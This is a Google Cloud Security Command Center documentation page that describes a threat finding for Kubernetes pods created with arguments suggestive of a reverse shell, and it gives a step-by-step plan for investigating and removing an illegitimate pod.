Execution: Kubernetes Pod Created with Potential Reverse Shell Arguments
Stay organized with collections
Save and categorize content based on your preferences.
This document describes a threat finding type in Security Command Center. Threat findings are generated by
threat detectors when they detect
a potential threat in your cloud resources. For a full list of available threat findings, see Threat findings index.
Overview
Someone created a Pod that contains commands or arguments commonly associated
with a reverse shell. Attackers
use reverse shells to expand or maintain their initial access to a cluster and
to execute arbitrary commands. For more details, see the log message for this
alert.
How to respond
The following response plan might be appropriate for this finding, but might also impact operations.
Carefully evaluate the information you gather in your investigation to determine the best way to
resolve findings.
To respond to this finding, do the following:
Confirm that the Pod has a legitimate reason to specify these commands and
arguments.
Determine whether there are other signs of malicious activity from the Pod or
principal in the audit logs in Cloud Logging.
If the principal isn't a service account (IAM or Kubernetes),
contact the owner of the account to confirm whether the legitimate owner
conducted the action.
If the principal is a service account (IAM or Kubernetes),
identify the legitimacy of what caused the service account to perform this
action
If the Pod is not legitimate, remove it, along with any associated RBAC
bindings and service accounts that the workload used and that allowed its
creation.
[[["Easy to understand","easyToUnderstand","thumb-up"],["Solved my problem","solvedMyProblem","thumb-up"],["Other","otherUp","thumb-up"]],[["Hard to understand","hardToUnderstand","thumb-down"],["Incorrect information or sample code","incorrectInformationOrSampleCode","thumb-down"],["Missing the information/samples I need","missingTheInformationSamplesINeed","thumb-down"],["Other","otherDown","thumb-down"]],["Last updated 2025-09-04 UTC."],[],[],null,["| Premium and Enterprise [service tiers](/security-command-center/docs/service-tiers)\n\nThis document describes a threat finding type in Security Command Center. Threat findings are generated by\n[threat detectors](/security-command-center/docs/concepts-security-sources#threats) when they detect\na potential threat in your cloud resources. For a full list of available threat findings, see [Threat findings index](/security-command-center/docs/threat-findings-index).\n\nOverview\n\nSomeone created a Pod that contains commands or arguments commonly associated\nwith a [reverse shell](https://attack.mitre.org/techniques/T1059/). Attackers\nuse reverse shells to expand or maintain their initial access to a cluster and\nto execute arbitrary commands. For more details, see the log message for this\nalert.\n\nHow to respond\n\n\nThe following response plan might be appropriate for this finding, but might also impact operations.\nCarefully evaluate the information you gather in your investigation to determine the best way to\nresolve findings.\n\nTo respond to this finding, do the following:\n\n1. Confirm that the Pod has a legitimate reason to specify these commands and arguments.\n2. Determine whether there are other signs of malicious activity from the Pod or principal in the audit logs in Cloud Logging.\n3. If the principal isn't a service account (IAM or Kubernetes), contact the owner of the account to confirm whether the legitimate owner conducted the action.\n4. If the principal is a service account (IAM or Kubernetes), identify the legitimacy of what caused the service account to perform this action\n5. If the Pod is not legitimate, remove it, along with any associated RBAC bindings and service accounts that the workload used and that allowed its creation.\n\nWhat's next\n\n- Learn [how to work with threat\n findings in Security Command Center](/security-command-center/docs/how-to-investigate-threats).\n- Refer to the [Threat findings index](/security-command-center/docs/threat-findings-index).\n- Learn how to [review a\n finding](/security-command-center/docs/how-to-investigate-threats#reviewing_findings) through the Google Cloud console.\n- Learn about the [services that\n generate threat findings](/security-command-center/docs/concepts-security-sources#threats)."]]
